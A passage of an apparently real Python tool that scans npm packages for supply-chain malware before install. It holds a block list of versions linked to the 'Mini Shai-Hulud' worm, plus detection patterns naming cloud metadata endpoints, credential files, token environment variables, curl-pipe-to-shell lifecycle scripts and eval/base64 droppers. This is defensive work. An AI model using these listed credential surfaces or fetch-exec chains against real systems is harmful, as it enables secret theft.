# Mini Shai-Hulud May-12 wave: @mistralai/* (npm) — separate from PyPI mistralai
# (https://www.aikido.dev/blog/mini-shai-hulud-is-back-tanstack-compromised).
"@mistralai/mistralai": {"2.2.2", "2.2.3", "2.2.4"},
"@mistralai/mistralai-gcp": {"1.7.1", "1.7.2", "1.7.3"},
"@mistralai/mistralai-azure": {"1.7.1", "1.7.2", "1.7.3"},
# Mini Shai-Hulud May-12 wave: @tallyui/* (30 entries, 10 packages)
# (Aikido enumeration).
"@tallyui/components": {"1.0.1", "1.0.2", "1.0.3"},
"@tallyui/connector-medusa": {"1.0.1", "1.0.2", "1.0.3"},
"@tallyui/connector-shopify": {"1.0.1", "1.0.2", "1.0.3"},
"@tallyui/connector-vendure": {"1.0.1", "1.0.2", "1.0.3"},
"@tallyui/connector-woocommerce": {"1.0.1", "1.0.2", "1.0.3"},
"@tallyui/core": {"0.2.1", "0.2.2", "0.2.3"},
"@tallyui/database": {"1.0.1", "1.0.2", "1.0.3"},
"@tallyui/pos": {"0.1.1", "0.1.2", "0.1.3"},
"@tallyui/storage-sqlite": {"0.2.1", "0.2.2", "0.2.3"},
"@tallyui/theme": {"0.2.1", "0.2.2", "0.2.3"},
# Mini Shai-Hulud May-12 wave: @beproduct/nestjs-auth (18 versions)
# (Aikido enumeration).
"@beproduct/nestjs-auth": {
"0.1.2",
"0.1.3",
"0.1.4",
"0.1.5",
"0.1.6",
"0.1.7",
"0.1.8",
"0.1.9",
"0.1.10",
"0.1.11",
"0.1.12",
"0.1.13",
"0.1.14",
"0.1.15",
"0.1.16",
"0.1.17",
"0.1.18",
"0.1.19",
},
# Mini Shai-Hulud May-12 wave: @draftlab/* + @draftauth/*
# (Aikido enumeration).
"@draftauth/client": {"0.2.1", "0.2.2"},
"@draftauth/core": {"0.13.1", "0.13.2"},
"@draftlab/auth": {"0.24.1", "0.24.2"},
"@draftlab/auth-router": {"0.5.1", "0.5.2"},
"@draftlab/db": {"0.16.1"},
# Mini Shai-Hulud May-12 wave: @taskflow-corp/cli + @tolka/cli
# (Aikido enumeration).
"@taskflow-corp/cli": {"0.1.24", "0.1.25", "0.1.26", "0.1.27", "0.1.28", "0.1.29"},
"@tolka/cli": {"1.0.2", "1.0.3", "1.0.4", "1.0.5", "1.0.6"},
# Mini Shai-Hulud May-12 wave: @ml-toolkit-ts/* + @mesadev/* + @dirigible-ai/sdk + @supersurkhet/*
# (Aikido enumeration).
"@dirigible-ai/sdk": {"0.6.2", "0.6.3"},
"@mesadev/rest": {"0.28.3"},
"@mesadev/saguaro": {"0.4.22"},
"@mesadev/sdk": {"0.28.3"},
"@ml-toolkit-ts/preprocessing": {"1.0.2", "1.0.3"},
"@ml-toolkit-ts/xgboost": {"1.0.3", "1.0.4"},
"@supersurkhet/cli": {"0.0.2", "0.0.3", "0.0.4", "0.0.5", "0.0.6", "0.0.7"},
"@supersurkhet/sdk": {"0.0.2", "0.0.3", "0.0.4", "0.0.5", "0.0.6", "0.0.7"},
# Mini Shai-Hulud May-12 wave: Unscoped packages (10 entries)
# (Aikido enumeration).
"safe-action": {"0.8.3", "0.8.4"},
"ts-dna": {"3.0.1", "3.0.2", "3.0.3", "3.0.4"},
"cross-stitch": {"1.1.3", "1.1.4", "1.1.5", "1.1.6"},
"cmux-agent-mcp": {"0.1.3", "0.1.4", "0.1.5", "0.1.6", "0.1.7", "0.1.8"},
"agentwork-cli": {"0.1.4", "0.1.5"},
"git-branch-selector": {"1.3.3", "1.3.4", "1.3.5", "1.3.6", "1.3.7"},
"wot-api": {"0.8.1", "0.8.2", "0.8.3", "0.8.4"},
"git-git-git": {"1.0.8", "1.0.9", "1.0.10", "1.0.11", "1.0.12"},
"nextmove-mcp": {"0.1.3", "0.1.4", "0.1.5", "0.1.6", "0.1.7"},
"ml-toolkit-ts": {"1.0.4", "1.0.5"},
# Cross-ecosystem Mini Shai-Hulud (Apr-30 wave): npm counterpart of
# PyPI lightning 2.6.2/2.6.3. Same threat actor (TeamPCP) per Semgrep,
# Aikido, OX Security, Resecurity. Safe version: 7.0.3 and earlier.
"intercom-client": {"7.0.4"},
}
# Cloud / k8s / CI credential surfaces. A bare substring match here
# false-positives on DEFENSIVE code -- e.g. langchain ships an SSRF
# protection module with a literal blocklist of IMDS IPs. We split
# these into two tiers:
#
# ALWAYS_BAD: substrings with no legitimate use anywhere in a
# dependency. A bare match is enough.
#
# NEEDS_CONTEXT: hosts/paths that DO appear legitimately in
# defensive code. We only fire when they co-occur with a fetch
# verb or appear inside an http URL -- that is the structural
# difference between "blocked address constant" and "exfil
# target".
#
# The dispatch lives in `_scan_cred_surface` below.
CRED_HOST_ALWAYS_BAD: tuple[tuple[str, str], ...] = (
("registry.npmjs.org/-/npm/v1/tokens", "npm publish-token enumeration endpoint"),
("ACTIONS_ID_TOKEN_REQUEST_URL", "GitHub Actions OIDC token-exchange endpoint env"),
("ACTIONS_ID_TOKEN_REQUEST_TOKEN", "GitHub Actions OIDC token-exchange token env"),
)
# Hosts that need fetch-verb or URL-scheme context to be malicious.
CRED_HOST_NEEDS_CONTEXT: tuple[tuple[str, str], ...] = (
("169.254.169.254", "AWS / GCP / Azure instance metadata service (IMDS)"),
("169.254.170.2", "ECS task metadata service"),
("metadata.google.internal", "GCE metadata service"),
("vault.svc.cluster.local", "in-cluster HashiCorp Vault endpoint"),
(
"/var/run/secrets/kubernetes.io/serviceaccount",
"Kubernetes ServiceAccount token path",
),
)
# Credentials a frontend package should NEVER need to read. Bare
# substring match is too noisy (object-treeify ships a `docker` dev
# script that mounts ~/.npmrc -- legitimate dev tooling, never run
# at install time). We instead surface these only when they appear
# inside a LIFECYCLE script (preinstall / install / postinstall /
# prepare), which is the only path that runs automatically on
# `npm ci`. See `scan_package_json` below.
CRED_PATH_SUBSTRINGS: tuple[tuple[str, str], ...] = (
("/.npmrc", "npm credentials file"),
("/.aws/credentials", "AWS shared credentials file"),
("/.ssh/id_rsa", "SSH private key"),
("/.ssh/id_ed25519", "SSH private key"),
("/.docker/config.json", "Docker registry credentials"),
("/.kube/config", "Kubernetes kubeconfig"),
)
# Fetch verbs whose presence near a metadata host upgrades a bare
# substring hit into an actionable finding.
_FETCH_VERBS_PAT = (
r"(?:fetch|axios|XMLHttpRequest|got\b|undici|"
r"http\.get|https\.get|http\.request|https\.request|"
r"new\s+URL|url\.parse|net\.connect|"
r"\.request\s*\(|\.get\s*\(\s*['\"]\s*https?://)"
)
# JS regex patterns (compile lazily).
_JS_FETCH_EVAL = re.compile(
r"""(?xs)
(?:
Function\s*\(\s*['"`] # new Function("...")
| eval\s*\(\s*['"`]
| \(\s*0\s*,\s*eval\s*\)\s*\(
)
.{0,200}
(?:atob\s*\(|Buffer\s*\.from\s*\([^)]+,\s*['"]base64)
""",
)
# `process.env.GITHUB_TOKEN` / `NPM_TOKEN` / `AWS_*` access in
# top-level / install-time code is suspicious. We also catch
# `os.environ["GITHUB_TOKEN"]` for the rare Python-in-npm postinstall.
_JS_ENV_TOKEN = re.compile(
r"""(process\.env\.|os\.environ\[?['"])(?:
GITHUB_TOKEN | GH_TOKEN | NPM_TOKEN | NODE_AUTH_TOKEN
| AWS_ACCESS_KEY_ID | AWS_SECRET_ACCESS_KEY | AWS_SESSION_TOKEN
| GOOGLE_APPLICATION_CREDENTIALS
| DOCKER_AUTH_CONFIG | VAULT_TOKEN
)['"]?\]?""",
re.VERBOSE,
)
# Suspicious lifecycle-script payloads. Anything in a package.json
# `scripts` field that wgets/curls an external resource and executes
# it. We do NOT block ALL curl/wget in scripts (some legit packages
# fetch test fixtures into devDependencies), but we DO block the
# fetch+exec chain.
_LIFECYCLE_FETCH_EXEC = re.compile(
r"""(?xs)
(?:curl|wget|fetch|http\.get|axios\.get)\s+ # fetch verb
.{0,200}
(?:\|\s*(?:sh|bash|node|python|eval)\b # pipe to interpreter
| \&\&\s*(?:sh|bash|node|python|eval)\b # &&-chain to interpreter
| -o\s+\S+\s*&&\s*(?:sh|bash|node|python) # download then run
| --post-file\s+
| \$\(.*\) # command-sub of fetched content
)
""",
)
# Obfuscation: large JS file that is mostly one line of base64-ish
# blob with a Function() / eval() bookend. Tuned against the
# router_init.js shape (2.3 MB obfuscated single-blob).
_OBFUSC_BLOB = re.compile(
r"""(?xs)
(?:Function|eval)\s*\(\s*['"`]?
[A-Za-z0-9+/=_-]{2048,} # >=2 KiB of b64-ish
""",
)
# ─────────────────────────────────────────────────────────────────────
# Lockfile parsing.
# ─────────────────────────────────────────────────────────────────────
def parse_lockfile(path: Path) -> tuple[list[PackageEntry], list[Finding]]:
"""Return (entries, structural_findings).
Structural findings here are HIGH-severity refusals that should
short-circuit the scan -- a lockfile with non-registry resolved
URLs is itself a finding (covered by scripts/lockfile_supply_chain
_audit.py in detail; we surface a summary here so this scanner is
standalone-runnable).
"""
entries: list[PackageEntry] = []
findings: list[Finding] = []
try:
lock = json.loads(path.read_text(encoding = "utf-8"))
except (OSError, json.JSONDecodeError) as exc:
findings.append(
Finding(
severity = CRITICAL,
package = "<root>",
filename = str(path),
pattern = "lockfile-unreadable",
detail = f"could not parse: {exc}",
)
)
return entries, findings
if lock.get("lockfileVersion") not in (2, 3):
findings.append(
Finding(
severity = HIGH,
package = "<root>",
filename = str(path),
pattern = "unsupported-lockfile-version",
detail = (
f"only lockfileVersion 2 or 3 supported; got "
f"{lock.get('lockfileVersion')!r}"
),
)
)
return entries, findings
for key, entry in (lock.get("packages") or {}).items():
if key == "" or entry.get("link"):
continue
# Nested fold-ins (deps inside another package's node_modules/)
# are covered by the parent tarball's integrity. Skip.
if key.count("/node_modules/") >= 1:
continue
resolved = entry.get("resolved")
if not resolved:
continue
# Strict registry origin check. lockfile_supply_chain_audit
# already catches this; double-defend here so this scanner
# cannot be tricked into fetching from an attacker-chosen URL.
parsed = urllib.parse.urlparse(resolved)
if parsed.scheme != "https" or parsed.hostname != ALLOWED_DOWNLOAD_HOST:
findings.append(
Finding(
severity = CRITICAL,
package = key,
filename = str(path),
pattern = "non-registry-resolved-url",
detail = (
f"resolved={resolved!r}; only "
f"https://{ALLOWED_DOWNLOAD_HOST}/ is "
"permitted. Refusing to download."
),
)
)
continue
integrity = entry.get("integrity")
if not integrity:
findings.append(
Finding(
severity = HIGH,
package = key,
filename = str(path),
pattern = "missing-integrity-hash",
detail = "no `integrity` field; cannot verify download",
)
)
continue
# node_modules/@scope/name -> @scope/name; node_modules/name -> name
nm = "node_modules/"
name = key[len(nm) :] if key.startswith(nm) else key
version = entry.get("version") or "<unversioned>"
entries.append(
PackageEntry(
name = name,
version = version,
resolved = resolved,
integrity = integrity,
lockfile_key = key,
)
)
return entries, findings
# ─────────────────────────────────────────────────────────────────────
# Tarball download (registry-only, size-capped, integrity-verified).
# ─────────────────────────────────────────────────────────────────────
def _decode_integrity(integrity: str) -> tuple[str, bytes] | None:
"""Parse SRI integrity 'sha512-<base64>' -> (algo, digest_bytes)."""
if "-" not in integrity:
return None
algo, b64 = integrity.split("-", 1)
algo = algo.strip().lower()
if algo not in ("sha256", "sha384", "sha512"):
return None
try:
digest = _b64.b64decode(b64, validate = True)
except Exception:
return None
return algo, digest
def download_tarball(
entry: PackageEntry,
dest: Path,
*,
timeout: float = HARD_HTTP_TIMEOUT_S,
max_bytes: int = HARD_MAX_TARBALL_BYTES,
) -> tuple[Path, str | None]:
"""Stream-download entry.resolved to dest. Verify SRI integrity.
Returns (downloaded_path, error_or_none). On any error the
returned path may not exist. Network access is restricted to
https://{ALLOWED_DOWNLOAD_HOST}/ -- the caller passes a Request
we already validated.
"""
# Re-assert hostname; the entry was validated at parse time but a
# defence-in-depth check here means a future refactor cannot
# accidentally bypass it.
parsed = urllib.parse.urlparse(entry.resolved)
if parsed.scheme != "https" or parsed.hostname != ALLOWED_DOWNLOAD_HOST:
return dest, (f"refused download from non-allowlisted URL {entry.resolved!r}")
decoded = _decode_integrity(entry.integrity or "")
if decoded is None:
return dest, f"unparseable integrity field {entry.integrity!r}"
algo, expected_digest = decoded
h = hashlib.new(algo)
req = urllib.request.Request(
entry.resolved,
headers = {
"User-Agent": "unsloth-scan-npm-packages/1.0 (+supply-chain audit)",
"Accept": "application/octet-stream",
},
method = "GET",
)
try:
with urllib.request.urlopen(req, timeout = timeout) as r:
# Advertised length, if any.
cl = r.headers.get("Content-Length")
if cl is not None:
try:
cl_int = int(cl)
if cl_int > max_bytes:
return dest, (f"Content-Length {cl_int} > cap {max_bytes}")
except ValueError:
pass
written = 0
with open(dest, "wb") as out:
while True:
chunk = r.read(64 * 1024)
if not chunk:
break
written += len(chunk)
if written > max_bytes:
return dest, (
f"download exceeded cap {max_bytes} bytes "
f"after {written} bytes"
)
h.update(chunk)
out.write(chunk)
except Exception as exc:
return dest, f"download failed: {exc}"
actual = h.digest()
if actual != expected_digest:
return dest, (
f"integrity mismatch: expected {algo}={_b64.b64encode(expected_digest).decode()!r}, "
f"got {algo}={_b64.b64encode(actual).decode()!r}"
)
return dest, None
# ─────────────────────────────────────────────────────────────────────
# Safe tar extraction. Every Tarfile member is policed before write.
# ─────────────────────────────────────────────────────────────────────
def _is_within(root: Path, candidate: Path) -> bool:
try:
return candidate.resolve().is_relative_to(root.resolve())
except (AttributeError, ValueError):
# Python <3.9 fallback (we target 3.10+ but be defensive).
try:
candidate.resolve().relative_to(root.resolve())
return True
except Exception:
return False
def safe_extract(
tarball_path: Path,
extract_root: Path,
*,
max_total_bytes: int = HARD_MAX_TOTAL_BYTES,
max_members: int = HARD_MAX_MEMBERS,
) -> str | None:
"""Extract tarball_path under extract_root with policed members.
Returns None on success, or a string describing the refusal.
Streams via `r|gz` so we can abort mid-extraction without having
materialised the rest of the archive.
"""
extract_root.mkdir(parents = True, exist_ok = True)
total = 0
count = 0
try:
# Open in streaming mode so we never seek backwards in the
# input. `r|gz` rejects malformed gzip frames immediately.
with tarfile.open(tarball_path, mode = "r|gz") as tf:
for member in tf:
count += 1
if count > max_members:
return f"member count {count} exceeded cap {max_members}"
name = member.name
# Reject obvious path-escape.
if name.startswith("/") or ".." in Path(name).parts:
return f"refused unsafe member name {name!r}"
# Reject device files, FIFOs, sockets, symlinks, hardlinks.
if member.issym() or member.islnk():
return f"refused link member {name!r} (sym/lnk)"
if member.isdev() or member.isfifo():
return f"refused special member {name!r}"
# Cumulative cap is checked against DECLARED size up
# front to short-circuit obvious bombs without reading
# the body.
declared = max(member.size, 0)
if declared > HARD_MAX_BINARY_FILE_BYTES:
return (
f"member {name!r} declared size {declared} > "
f"absolute cap {HARD_MAX_BINARY_FILE_BYTES}"
)
if total + declared > max_total_bytes:
return (
f"cumulative bytes {total + declared} > cap "
f"{max_total_bytes} at {name!r}"
)
# Strip leading "package/" -- the npm convention. We do
# NOT trust npm to be right, so we explicitly resolve
# the destination and refuse anything that escapes.
dest = extract_root / name
if not _is_within(extract_root, dest):
return f"refused escape: {name!r} resolved outside root"
if member.isdir():
dest.mkdir(parents = True, exist_ok = True)
continue
if not member.isfile():
# Anything we didn't classify above is unknown.
return f"refused unknown member type for {name!r}"
dest.parent.mkdir(parents = True, exist_ok = True)
src = tf.extractfile(member)
if src is None:
continue
# Sniff first 16 bytes to classify text vs binary.
# Text-cap members get the tight 16 MiB limit; binary
# members (executables, .node, .wasm, native libs)
# get the generous binary cap. We bound BOTH cases.
header = src.read(16)
is_binary = _looks_binary(name, header)
file_cap = (
HARD_MAX_BINARY_FILE_BYTES
if is_binary
else HARD_MAX_TEXT_FILE_BYTES
)
if declared > file_cap:
return (
f"member {name!r} declared size {declared} > "
f"cap {file_cap} ({'binary' if is_binary else 'text'})"
)
# Read remainder, bounded.
remainder_cap = file_cap - len(header)
rest = src.read(remainder_cap + 1)
data = header + rest
if len(data) > file_cap:
return (
f"member {name!r} body exceeded declared size cap "
f"({'binary' if is_binary else 'text'})"
)
total += len(data)
# Write with restrictive mode (rw-r--r--) so even if
# someone runs the extract dir nothing is executable.
with open(dest, "wb") as out:
out.write(data)
os.chmod(dest, 0o644)
except tarfile.TarError as exc:
return f"tar parse error: {exc}"
except Exception as exc:
return f"unexpected extract error: {exc!r}"
return None
# ─────────────────────────────────────────────────────────────────────
# Content scanning.
# ─────────────────────────────────────────────────────────────────────
def _evidence(text: str, pat: re.Pattern, max_chars: int = 200) -> str:
m = pat.search(text)
if not m:
return ""
start = max(0, m.start() - 30)
end = min(len(text), m.end() + 30)
snippet = text[start:end].replace("\n", " ")
if len(snippet) > max_chars:
snippet = snippet[:max_chars] + "..."
return snippet
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")
def scan_package_json(
pkg: PackageEntry,
rel: str,
text: str,
) -> list[Finding]:
findings: list[Finding] = []
try:
meta = json.loads(text)
except Exception:
return findings
if not isinstance(meta, dict):
return findings
scripts = meta.get("scripts") or {}
if not isinstance(scripts, dict):
return findings
for hook in LIFECYCLE_HOOKS:
body = scripts.get(hook)
if not isinstance(body, str):
continue
if _LIFECYCLE_FETCH_EXEC.search(body):
findings.append(
Finding(
severity = CRITICAL,
package = pkg.display,
filename = rel,
pattern = f"lifecycle-fetch-exec ({hook})",
evidence = body,
detail = (
f"`scripts.{hook}` fetches an external "
"resource and pipes/chains it to an "
"interpreter; this is the install-time RCE "
"vector. Refusing to install."
),
)
)
# Credential file paths inside a lifecycle script are
# exfiltration prep -- npm runs these scripts automatically
# on `npm ci`. Manual `scripts.*` entries (like a `docker`
# dev script) are out of scope: npm does not run them.
for path_substr, why in CRED_PATH_SUBSTRINGS:
if path_substr in body:
findings.append(
Finding(
severity = HIGH,
package = pkg.display,
filename = rel,
pattern = f"cred-path-in-lifecycle ({hook})",
evidence = body,
detail = (
f"`scripts.{hook}` references {why} "
f"({path_substr!r}); install-time access "
"to local credential files is the "
"exfiltration prep step"
),
)
)
if _JS_ENV_TOKEN.search(body):
findings.append(
Finding(
severity = HIGH,
package = pkg.display,
filename = rel,
pattern = f"cred-env-in-lifecycle ({hook})",
evidence = _evidence(body, _JS_ENV_TOKEN),
detail = (
f"`scripts.{hook}` references a credential "
"env var (GITHUB_TOKEN / NPM_TOKEN / AWS_* "
"/ etc); install-time access to runner "
"secrets is the exfiltration prep step"
),
)
)
# Optional deps pointing at github: are the TanStack-style
# injection vector.
opt = meta.get("optionalDependencies") or {}
if isinstance(opt, dict):
for k, v in opt.items():
if isinstance(v, str) and (
v.startswith("github:")
or v.startswith("git+")
or v.startswith("git://")
):
findings.append(
Finding(
severity = HIGH,
package = pkg.display,
filename = rel,
pattern = "optional-dep-non-registry",
evidence = f"{k}={v}",
detail = (
"package.json `optionalDependencies` "
"points at a non-registry source; this "
"is the Shai-Hulud worm injection shape."
),
)
)
return findings
def _host_in_outbound_context(text: str, host: str) -> bool:
"""True if `host` appears in a way consistent with an outbound call.
A bare `"169.254.169.254"` array literal (defensive blocklist) is
safe; a `fetch("http://169.254.169.254/...")` is not. The signal
is co-occurrence with either an HTTP URL scheme or a fetch verb
within a short window.
A defensive blocklist looks like:
const CLOUD_METADATA_IPS = ["169.254.169.254", "169.254.170.2"];
An exfil call looks like:
fetch("http://169.254.169.254/latest/meta-data/...")
http.request({ host: "169.254.169.254", path: "/..." })
"""
# Esc for use in a regex (IPs contain dots).
host_re = re.escape(host)
# 1. URL form: http://host or https://host or //host/ or //host"
url_form = re.compile(
rf"(?:https?:)?//{host_re}(?:[:/\"'?#]|$)",
)
if url_form.search(text):
return True
# 2. host appears within 200 chars of a fetch verb (either side).
fetch_context = re.compile(
rf"(?:{_FETCH_VERBS_PAT})[^\n]{{0,200}}{host_re}"
rf"|{host_re}[^\n]{{0,200}}(?:{_FETCH_VERBS_PAT})",
re.IGNORECASE,
)
if fetch_context.search(text):
return True
# 3. `host:` / `hostname:` config field referencing the IP.
cfg_form = re.compile(
rf"(?:host|hostname)\s*:\s*['\"`]{host_re}['\"`]",
re.IGNORECASE,
)
if cfg_form.search(text):
return True
return False
def scan_text_blob(
pkg: PackageEntry,
rel: str,
text: str,
) -> list[Finding]:
findings: list[Finding] = []
# IOC substrings (literal, case-sensitive).
for needle, (sev, why) in KNOWN_IOC_STRINGS.items():
if needle in text:
findings.append(
Finding(
severity = sev,
package = pkg.display,
filename = rel,
pattern = "known-ioc-string",
evidence = needle,
detail = f"{why}: {needle!r}",
)
)
# Credential surfaces. Tier 1: hosts with no legitimate use,
# bare substring is enough.
for needle, why in CRED_HOST_ALWAYS_BAD:
if needle in text:
findings.append(
Finding(
severity = HIGH,
package = pkg.display,
filename = rel,
pattern = "cred-surface-host (always-bad)",
evidence = needle,
detail = (
f"references {why} ({needle!r}); no legitimate "
"frontend use of this surface"
),
)
)
# Credential surfaces. Tier 2: hosts that do appear in defensive
# code; require co-occurrence with a fetch verb or URL prefix.
for needle, why in CRED_HOST_NEEDS_CONTEXT:
if needle in text and _host_in_outbound_context(text, needle):
findings.append(
Finding(
severity = HIGH,
package = pkg.display,
filename = rel,
pattern = "cred-surface-host (outbound)",
evidence = needle,
detail = (
f"references {why} ({needle!r}) in an outbound "
"call / URL / host config; a defensive blocklist "
"literal would not match this rule"
),
)
)
# Credential PATHS are deliberately not scanned here; they have
# too high a false-positive rate at file scope (defensive code,
# docker mounts, AWS SDK docs strings). `scan_package_json`
# catches the malicious case -- credential paths inside a
# lifecycle script run automatically on `npm ci`.
# JS-specific regex.
if _JS_FETCH_EVAL.search(text):
findings.append(
Finding(
severity = HIGH,
package = pkg.display,
filename = rel,
pattern = "js-fetch-eval",
evidence = _evidence(text, _JS_FETCH_EVAL),
detail = (
"Function/eval against base64-decoded payload "
"(obfuscated dropper shape)"
),
)
)
if _JS_ENV_TOKEN.search(text):
findings.append(
Finding(
severity = MEDIUM,
package = pkg.display,
filename = rel,
pattern = "js-env-token",
evidence = _evidence(text, _JS_ENV_TOKEN),
detail = ("references credential env vars in package source"),
)
)
if _OBFUSC_BLOB.search(text):
findings.append(
Finding(
severity = HIGH,
package = pkg.display,
filename = rel,
pattern = "obfuscated-blob",
evidence = _evidence(text, _OBFUSC_BLOB),
detail = (
"large base64-ish blob fed to Function/eval; "
"matches the TanStack worm dropper shape"
),
)
)
return findings
# Filename suffix decides which scanners run. We deliberately treat
# *.cjs/*.mjs/*.ts the same as *.js -- attackers use whichever
# extension the consumer's bundler / loader resolves.
_TEXT_SUFFIXES = (
".js",
".mjs",
".cjs",
".ts",
".tsx",
".json",
".html",
".htm",
".sh",
".bash",
".zsh",
".py",
".rb",
".yml",
".yaml",
)
def scan_extracted_tree(
pkg: PackageEntry,
root: Path,
) -> list[Finding]:
findings: list[Finding] = []
for path in sorted(root.rglob("*")):
if not path.is_file():
continue
rel = path.relative_to(root).as_posix()
lower = rel.lower()
if not lower.endswith(_TEXT_SUFFIXES):
# Skip native binaries entirely -- regex over compiled
# machine code is just noise (false positives in WASM
# opcodes, .node BSS segments, image pixel data). Use
# content-magic detection so extensionless executables
# (eg `package/biome`) and versioned shared libraries
# are also skipped.
try:
if path.stat().st_size > HARD_MAX_TEXT_FILE_BYTES:
continue
with open(path, "rb") as fh:
header = fh.read(16)
if _looks_binary(rel, header):
continue
data = header + path.read_bytes()[len(header) :]
except OSError:
continue
text = data.decode("utf-8", errors = "replace")
for needle, (sev, why) in KNOWN_IOC_STRINGS.items():
if needle in text:
findings.append(
Finding(
severity = sev,
package = pkg.display,
filename = rel,
pattern = "known-ioc-string",
evidence = needle,
detail = f"{why}: {needle!r}",
)
)
continue
try:
data = path.read_bytes()
except OSError:
continue
text = data.decode("utf-8", errors = "replace")
if rel.endswith("package.json"):
findings.extend(scan_package_json(pkg, rel, text))
findings.extend(scan_text_blob(pkg, rel, text))
return findings
# ─────────────────────────────────────────────────────────────────────
# Orchestrator.
# ─────────────────────────────────────────────────────────────────────
def scan_one(
pkg: PackageEntry,
workspace: Path,
) -> tuple[list[Finding], str | None]:
"""Download + extract + scan a single package. Cleans up its dir.
Returns (findings, error). `error` is non-None only on hard
failures (download error, integrity mismatch, malformed tarball);
on a clean run with findings the error is None and the caller
decides exit code based on severity.
"""
pkg_dir = workspace / f"{pkg.name.replace('/', '_')}-{pkg.version}"
pkg_dir.mkdir(parents = True, exist_ok = True)
tarball = pkg_dir / "pkg.tgz"
extract = pkg_dir / "x"
try:
_, err = download_tarball(pkg, tarball)
if err:
return [], err
err = safe_extract(tarball, extract)
if err:
return [], err
return scan_extracted_tree(pkg, extract), None
finally:
# Always wipe per-package data to keep the workspace bounded.
try:
shutil.rmtree(pkg_dir, ignore_errors = True)
except Exception:
pass
def main(argv: list[str] | None = None) -> int:
parser = argparse.ArgumentParser(
description = "Pre-install npm tarball content scanner.",
)
parser.add_argument(
"--lockfile",
default = str(REPO_ROOT / "studio" / "frontend" / "package-lock.json"),
help = "Path to package-lock.json (default: studio/frontend).",
)
parser.add_argument(
"--max-packages",
type = int,
default = 0,
help = (
"Cap on number of packages to scan (0 = no cap). Useful "
"for local triage; CI runs with 0."
),
)
parser.add_argument(
"--fail-on",
choices = ("info", "medium", "high", "critical"),
default = "high",
help = (
"Lowest severity that fails the run (default: high). "
"Medium and below print but exit 0."
),
)
args = parser.parse_args(argv)
lockfile = Path(args.lockfile).resolve()
if not lockfile.exists():
print(f"[scan-npm] lockfile not found: {lockfile}", file = sys.stderr)
return 2
entries, struct_findings = parse_lockfile(lockfile)
if struct_findings:
print(
f"[scan-npm] {len(struct_findings)} structural finding(s) "
"from lockfile pass; subsequent download scan skipped for "
"those entries.",
flush = True,
)
if args.max_packages > 0:
entries = entries[: args.max_packages]
workspace = Path(tempfile.mkdtemp(prefix = "npm-scan-")).resolve()
atexit.register(lambda: shutil.rmtree(workspace, ignore_errors = True))
print(
f"[scan-npm] workspace: {workspace}\n"
f"[scan-npm] scanning {len(entries)} package(s) from {lockfile}",
flush = True,
)
all_findings: list[Finding] = list(struct_findings)
hard_errors: list[tuple[str, str]] = []
for i, pkg in enumerate(entries, start = 1):
print(
f"[scan-npm] [{i}/{len(entries)}] {pkg.display}",
flush = True,
)
blocked = BLOCKED_NPM_VERSIONS.get(pkg.name, set())
if pkg.version in blocked:
finding = Finding(
severity = CRITICAL,
package = pkg.display,
filename = "<lockfile>",
pattern = "blocked-known-malicious",
detail = f"{pkg.name}@{pkg.version} is on the BLOCKED_NPM_VERSIONS list",
)
all_findings.append(finding)
print(str(finding), flush = True)
continue
findings, err = scan_one(pkg, workspace)
if err:
hard_errors.append((pkg.display, err))
print(f"[scan-npm] ERROR {pkg.display}: {err}", flush = True)
continue
all_findings.extend(findings)
for f in findings:
print(str(f), flush = True)
# Sort by severity then package.
all_findings.sort(key = lambda f: (_SEVERITY_RANK[f.severity], f.package))
print(
f"\n[scan-npm] summary: {len(entries)} package(s), "
f"{len(all_findings)} finding(s), "
f"{len(hard_errors)} hard error(s)",
flush = True,
)
if hard_errors:
print("\n[scan-npm] HARD ERRORS:", file = sys.stderr)
for pkg, err in hard_errors:
print(f" {pkg}: {err}", file = sys.stderr)
threshold = {
"info": INFO,
"medium": MEDIUM,
"high": HIGH,
"critical": CRITICAL,
}[args.fail_on]
threshold_rank = _SEVERITY_RANK[threshold]
blocking = [f for f in all_findings if _SEVERITY_RANK[f.severity] <= threshold_rank]
if hard_errors or blocking:
if blocking:
print(
f"\n[scan-npm] FAIL: {len(blocking)} finding(s) "
f"at or above {threshold}",
file = sys.stderr,
)
return 1
print("\n[scan-npm] OK", flush = True)
return 0
if __name__ == "__main__":
sys.exit(main())